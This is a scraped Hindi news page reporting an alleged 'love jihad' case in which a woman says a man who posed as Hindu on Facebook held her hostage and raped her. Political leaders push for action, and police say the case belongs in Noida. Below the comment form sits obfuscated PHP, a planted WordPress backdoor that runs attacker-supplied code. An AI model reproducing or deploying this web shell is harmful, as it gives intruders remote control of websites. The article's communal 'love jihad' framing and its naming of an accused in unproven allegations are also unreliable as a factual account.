Love Jihad: अरमान ने आनंद बनकर हिंदू युवती को प्रेमजाल में फंसाया, हकीकत सामने आते ही बना ल‍िया बंधक, किया दुष्कर्म

Uttarakhand Press 5 October 2023: मिल एरिया के एक गांव की युवती को युवक ने अपनी पहचान छिपाकर प्रेमजाल में फंसाया। वह जब उसे अपने घर ले गया तो युवती को उसकी असलियत पता चली। युवक ने उसे तीन दिन तक बंधक बनाकर दुष्कर्म किया। हालत बिगड़ने पर उसका भदोही जिला अस्पताल में उपचार कराया गया और फिर ट्रेन में बैठाकर घर भेज दिया गया। पीड़िता 24 सितंबर से थाने के चक्कर लगा रही है, लेकिन उसकी एफआइआर नहीं लिखी गई। भाजपा और विहिप के नेताओं ने बुधवार को मामले की शिकायत प्रभारी मंत्री प्रतिभा शुक्ला से की।

पीड़िता ने बताया कि भदोही के कसाई बाजार निवासी अरमान खान ने फेसबुक पर आनंद सिंह के नाम से आईडी बना रखी है। फेसबुक के माध्यम से ही दोनों की मित्रता हुई। अरमान रायबरेली आया और उसे अपने साथ हरिद्वार ले गया। कुछ दिन वहां रुकने के बाद दोनों बनारस गए। वहां भी वे होटल में रुके। बाद में अरमान उसे अपने घर भदोही ले गया, तब उसकी सच्चाई पता चली। उसने विरोध किया तो अरमान के घरवालों ने उसे बंधक बना लिया गया। वह किसी तरह वहां से अपने घर पहुंची और परिवार के लोगों को आपबीती बताई। पीड़िता ने ये भी बताया कि अरमान ने ब्लैकमेल करके उससे 80 हजार रुपये भी ऐंठ लिए।

प्रभारी मंत्री को सौंपा ज्ञापन:
भाजपा के नगर महामंत्री राजीव जायसवाल, सुमित पांडेय, सूर्यकांत द्विवेदी, रंजीत सिंह, सौरभ पांडेय ने प्रभारी मंत्री प्रतिभा शुक्ला काे ज्ञापन सौंपा। उनको बताया कि लव जिहाद के मामलों में पुलिस कार्रवाई नहीं कर रही है, इसी वजह से इस तरह की वारदातें बढ़ रही हैं। प्रभारी मंत्री ने आवश्यक कार्रवाई कराने का आश्वासन उन्हें दिया। भाजपा के साथ विहिप के नेता भी मौजूद रहे।

नोएडा की है घटना:
मिल एरिया थानाध्यक्ष संजय कुमार सिंह ने बताया कि युवती नोएडा में निजी कंपनी में काम करती थी। वहीं पर उसकी मुस्लिम युवक से दोस्ती हुई। दोनों कुछ दिन हरिद्वार, बनारस और भदोही में रुके थे। जिस युवक पर आरोप लगाया गया है, वह रायबरेली कभी नहीं आया। इस मामले की रिपोर्ट नोएडा में दर्ज होनी चाहिए।

Read Previous

Cough Syrup Deaths: देश में बने दो कप सीरप में पाए गए जहरीले तत्व, विदेशों में 141 बच्चों की हुई थी मौत

Read Next

Uttarakhand Crime News: 12वीं की नाबालिग छात्रा को होटल ले जाकर सहपाठी ने किया दुष्कर्म, मुकदमा दर्ज

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}